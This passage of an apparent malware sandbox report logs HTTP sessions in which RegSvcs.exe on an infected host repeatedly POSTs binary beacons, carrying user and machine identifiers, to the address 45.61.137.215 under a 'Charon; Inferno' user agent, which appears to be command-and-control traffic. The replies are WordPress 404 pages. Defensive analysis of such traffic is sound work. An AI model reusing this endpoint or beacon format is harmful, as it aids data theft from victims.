May 29, 2024 15:43:49.354453087 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:49.354482889 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:49.354495049 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:43:49.354505062 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:43:49.354515076 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 29, 2024 15:43:49.354525089 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 29, 2024 15:43:49.354535103 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	49753	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:49.526859999 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:49.531759977 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:52.027256966 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:52.027296066 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:52.027306080 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:52.027326107 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:43:52.027338982 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:43:52.027350903 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:43:52.027360916 CEST	1236	IN	Data Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
May 29, 2024 15:43:52.027373075 CEST	896	IN	Data Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
May 29, 2024 15:43:52.028398037 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:52.028415918 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	49754	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:52.300724030 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:52.306535959 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:54.843964100 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:52 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:54.843986034 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:54.844032049 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:54.844078064 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 29, 2024 15:43:54.844088078 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:43:54.844151974 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:43:54.844172001 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:43:54.844192028 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:54.844204903 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:43:54.844218969 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	49755	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:55.212846041 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:55.217894077 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:57.950268030 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:55 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
